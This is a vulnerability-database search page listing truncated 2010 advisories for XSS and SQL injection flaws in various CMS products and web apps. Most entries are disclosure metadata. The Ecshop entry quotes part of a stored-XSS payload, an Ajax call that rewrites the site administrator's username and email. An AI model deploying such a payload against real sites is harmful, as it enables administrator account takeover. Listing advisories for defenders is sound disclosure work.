
4739 matches found

Packet Storm
added 2010/10/11 12:00 a.m., 29 views

Lantern CMS Cross Site Scripting

Vulnerability ID: HTB22621 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinlanterncms1.html Product: Lantern CMS Vendor: Lantern http://www.lanterncms.com/www/html/7-home-page.asp Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions...

AI score: 7
Exploits: 0

Packet Storm
added 2010/10/11 12:00 a.m., 22 views

expression-xss.txt

Vulnerability ID: HTB22618 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinexpressioncms1.html Product: Expression Vendor: Backbone Technology http://www.backbonetechnology.com Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions...

AI score: 7
Exploits: 0

Packet Storm
added 2010/09/30 12:00 a.m., 17 views

Pluck 4.6.3 Cross Site Scripting

Vulnerability ID: HTB22610 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinpluck.html Product: Pluck Vendor: Pluck Team http://www.pluck-cms.org Vulnerable Version: 4.6.3 and probably prior versions Vendor Notification: 15 September 2010 Vulnerability Type: XSS Cross Site Scripting...

Exploits: 0

exploitpack
added 2010/09/27 12:00 a.m., 16 views

Horde IMP Webmail 4.3.7 - fetchmailprefs.php HTML Injection

source: https://www.securityfocus.com/bid/43515/info Horde IMP Webmail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data before it is used in dynamic content. Attacker-supplied HTML ...

AI score: 7.6
Exploits: 0

ThreatPost
added 2010/09/21 12:11 p.m., 4 views

Persistent XSS Bug on Twitter Exploited by Worm

UPDATE— Within an hour of reports surfacing about a cross-site scripting bug on the Twitter home page, a worm exploiting the bug was released on the site. However, engineers at Twitter have repaired the bug and say that it no longer should be exploitable. The bug appeared Tuesday morning and...

AI score: 0.1
Exploits: 0, References: 2

seebug.org
added 2010/09/20 12:00 a.m., 24 views

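Ecshop 2.7.2 Persistent XSS (can obtain the administrator account)

Brief description: When a user edits their profile, JavaScript code is not filtered strictly enough, and XSS code goes straight into the database. Details: The password-protection question field is not filtered with a regular expression, while all the other fields are. We can enter XSS in the password-protection question, but the admin back end does not display the password-protection question when viewing member details, so this only works once the site's back end has added a new "member registration item"; after that it is displayed when viewing the details. Here, fill in a piece of code that includes an external JS file: " The content of the external test.js file is as follows: Ajax.call'privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"; Proof of vulnerability:...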

AI score: 7.1
Exploits: 0

Exploit DB
added 2010/09/15 12:00 a.m., 18 views

Mollify 1.6 - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/43262/info Mollify is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary JavaScript code in the browser of an unsuspecting user in the contex...

AI score: 7.4
Exploits: 0

NVD
added 2010/09/09 7:00 p.m., 16 views

CVE-2010-2762

The XPCSafeJSObjectWrapper class in the SafeJSObjectWrapper aka SJOW implementation in Mozilla Firefox 3.6.x before 3.6.9 and Thunderbird 3.1.x before 3.1.3 does not properly restrict objects at the end of scope chains, which allows remote attackers to execute arbitrary JavaScript code with chrom...

CVSS: 6.8, AI score: 8.6, EPSS: 0.0174
Exploits: 0, References: 12

Exploit DB
added 2010/09/06 12:00 a.m., 32 views

WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting

Author: Craw Email: [email protected] Software Link: http://wordpress.org/extend/plugins/events-manager-extended/ Version: 3.1.2 Category: webapplications + ExploiT 1 : If you are allowed to leave a comment: Persistent XSS Vulnerability: You...

AI score: 7.4
Exploits: 0

securityvulns
added 2010/09/02 12:00 a.m., 44 views

XSS vulnerability in Rumba CMS tags

Vulnerability ID: HTB22591 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinrumbacms.html Product: Rumba CMS Vendor: Rumba Netware Ltd. http://rumbacms.com Vulnerable Version: 2.4 and Probably Prior Versions Vendor Notification: 18 August 2010 Vulnerability Type: Stored XSS Cross Site...

AI score: 0.3
Exploits: 0

Packet Storm
added 2010/09/01 12:00 a.m., 18 views

ArtGK Cross Site Scripting

Vulnerability ID: HTB22588 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinartgkcms1.html Product: ArtGK CMS Vendor: ArtGK http://artgk-cms.ru/ Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions Vendor Notification: 18 August 201...

AI score: 0.2
Exploits: 0

securityvulns
added 2010/08/30 12:00 a.m., 46 views

XSS vulnerability in CompuCMS

Vulnerability ID: HTB22581 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityincompucms1.html Product: CompuCMS Vendor: CompuSoft A/S http://www.compusoft.dk/ Vulnerable Version: Current at 06.08.2010 and Probably Prior Versions Vendor Notification: 09 August 2010 Vulnerability Type: XSS...

AI score: 0.5
Exploits: 0

Packet Storm
added 2010/08/27 12:00 a.m., 23 views

Prometeo 1.0.65 SQL Injection

Prometeo vers. 1.0.65 -SQLi Vulnerability- -Vulnerability ID: LD3 -Product: Prometeo -Vendor: Prometeo...

AI score: 0.7
Exploits: 0

0day.today
added 2010/08/26 12:00 a.m., 21 views

Prometeo v1.0.65 SQL Injection Vulnerability

Exploit for php platform in category web applications. Prometeo v1.0.65 SQL Injection Vulnerability. Prometeo vers. 1.0.65 -SQLi Vulnerability- -Vulnerability ID: LD3 -Product:...

AI score: 7.1
Exploits: 0

exploitpack
added 2010/08/26 12:00 a.m., 28 views

Prometeo 1.0.65 - SQL Injection

Prometeo vers. 1.0.65 -SQLi Vulnerability- -Vulnerability ID: LD3 -Product: Prometeo -Vendor: Prometeo...

AI score: 0.7
Exploits: 0

securityvulns
added 2010/08/17 12:00 a.m., 150 views

XSS vulnerability in CMSimple

Vulnerability ID: HTB22558 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityincmsimple.html Product: CMSimple Vendor: Peter Andreas Harteg http://www.cmsimple.org/ Vulnerable Version: 3.3 and Probably Prior Versions Vendor Notification: 02 August 2010 Vulnerability Type: XSS Cross Site...

AI score: 0.7
Exploits: 0

securityvulns
added 2010/08/14 12:00 a.m., 44 views

XSS vulnerability in Onyx

Vulnerability ID: HTB22536 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinonyx.html Product: Onyx Vendor: Hulihan Applications http://hulihanapplications.com/projects/onyx Vulnerable Version: 0.3.2 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerability Type: XSS...

AI score: 0.4
Exploits: 0

securityvulns
added 2010/08/14 12:00 a.m., 82 views

XSS vulnerability in i-Web Suite

Vulnerability ID: HTB22544 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityiniwebsuite.html Product: i-Web Suite Vendor: immediaC world wide Inc http://www.immediac.com/ Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerabilit...

AI score: 0.8
Exploits: 0

Packet Storm
added 2010/08/13 12:00 a.m., 24 views

i-Web Suite SQL Injection / Cross Site Scripting

Vulnerability ID: HTB22544 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityiniwebsuite.html Product: i-Web Suite Vendor: immediaC world wide Inc http://www.immediac.com/ Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions Vend...

AI score: 0.3
Exploits: 0

Exploit DB
added 2010/08/11 12:00 a.m., 31 views

KnowledgeTree 3.5.2 Community Edition - Persistent Cross-Site Scripting

Exploit Title: KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability Date: 2010-08-11 Author: @fdiskyou e-mail: rui at deniable.org Software Link: http://www.knowledgetree.com/products/community/download Version: 3.5.2 Notes: Fixed in the last version. Go to search box or search...

AI score: 7
Exploits: 0